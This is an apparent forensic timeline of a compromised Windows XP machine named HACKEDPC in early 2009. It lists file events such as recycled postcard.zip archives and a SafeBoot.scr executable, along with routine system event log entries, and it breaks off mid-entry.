postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive01/05/09 16:55:58 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive01/09/09 8:04:12 written SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive01/09/09 8:04:17 written SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive01/15/09 16:21:34 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive01/15/09 16:21:34 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive01/30/09 12:08:11 created SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf
02/10/09 13:09:24 modified Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx02/10/09 13:09:24 written Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx02/10/09 13:09:32 accessed Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx
02/12/09 11:06:59 accessed Underwater Basket Weaving Majors and Minors 0708.xlsC:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls02/12/09 11:06:59 accessed UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls
02/13/09 7:26:50 modified MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/13/09 7:26:50 written MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/13/09 14:21:10 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service was successfully sent a start control. -02/13/09 14:21:10 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the running state. -02/13/09 14:35:14 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the stopped state. -02/13/09 14:38:09 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service was successfully sent a start control. -02/13/09 14:38:09 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the running state. -02/13/09 14:38:38 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Office Source Engine service was successfully sent a start control. -02/13/09 14:38:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Office Source Engine service entered the running state. -02/13/09 14:38:56 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Office Source Engine service entered the stopped state. -02/13/09 14:38:58 accessed wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:58 accessed xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:58 written wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:58 written xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:59 accessed accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:59 accessed pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:59 written accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:38:59 written pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive02/13/09 14:49:18 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the stopped state. -02/13/09 15:11:23 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 480 minutes. -02/13/09 15:11:23 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 479 minutes.;NtpClient has no source of accurate time. -02/13/09 16:31:36 accessed MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/13/09 16:31:36 created MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/13/09 16:31:50 accessed wmplayer.exe C:\\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive02/13/09 16:33:06 accessed uninstall.exe C:\\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive02/13/09 16:33:24 accessed setup.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File02/13/09 16:33:52 logged SysEvent.Evt EVENT ID: 19 EVENT TYPE: INFORMATION EVENT CATEGORY: Installation SID: COMPUTER: HACKEDPC DESCRIPTION: Installation Successful: Windows successfully installed the following update: Windows Malicious Software Removal Tool - February 2009 (KB890830) -02/13/09 16:34:03 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -02/16/09 7:43:27 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/16/09 7:43:40 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/16/09 7:43:40 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/16/09 7:44:15 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -02/16/09 7:44:15 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -02/16/09 7:44:36 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -02/16/09 7:44:38 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -02/16/09 7:44:45 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -02/16/09 7:45:49 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -02/16/09 7:45:58 modified MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/16/09 7:45:58 written MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/16/09 7:46:48 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -02/16/09 7:46:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -02/16/09 7:47:11 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -02/16/09 7:50:50 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/16/09 7:59:37 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 30 minutes. -02/16/09 7:59:37 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 29 minutes.;NtpClient has no source of accurate time. -02/16/09 8:29:38 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 60 minutes. -02/16/09 8:29:38 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 59 minutes.;NtpClient has no source of accurate time. -02/16/09 9:29:40 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 120 minutes. -02/16/09 9:29:40 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 119 minutes.;NtpClient has no source of accurate time. -02/16/09 10:10:20 accessed MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/16/09 10:10:20 created MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAPCorel PhotoPAINT Tone MapMisc File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/16/09 11:07:45 created RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf02/16/09 11:29:46 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 240 minutes. -02/16/09 11:29:46 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 239 minutes.;NtpClient has no source of accurate time. -02/16/09 11:59:18 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/16/09 12:45:39 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
![Page 7: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/7.jpg)
02/16/09 12:45:39 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/16/09 13:19:32 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/16/09 15:29:56 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 480 minutes. -02/16/09 15:29:56 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 479 minutes.;NtpClient has no source of accurate time. -02/16/09 16:08:56 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -02/16/09 16:08:56 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/16/09 16:10:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/16/09 16:59:42 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -02/17/09 7:46:02 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/17/09 7:46:16 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/17/09 7:46:16 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/17/09 7:46:44 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -02/17/09 7:46:44 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -02/17/09 7:46:59 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -02/17/09 7:46:59 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -02/17/09 7:47:22 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/17/09 7:48:17 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/17/09 7:48:17 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/17/09 7:48:21 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -02/17/09 7:48:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -02/17/09 7:48:24 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/17/09 7:48:31 created SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf02/17/09 7:48:38 created SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf02/17/09 7:48:41 created TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf02/17/09 7:48:49 created UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf02/17/09 7:48:51 created TRUEIMAGEMONITOR.EXE-08A65A75.pfC:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf02/17/09 7:48:54 created SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf02/17/09 7:49:03 created TIMOUNTERMONITOR.EXE-1A929E4A.pfC:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf02/17/09 7:49:09 created SBTRAYMANAGER.EXE-19E725FA.pfC:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf02/17/09 7:49:14 created WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf02/17/09 7:50:36 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -02/17/09 7:50:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -02/17/09 7:50:50 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -02/17/09 7:55:28 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/17/09 8:02:01 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 30 minutes. -02/17/09 8:02:01 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 29 minutes.;NtpClient has no source of accurate time. -02/17/09 8:32:02 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT 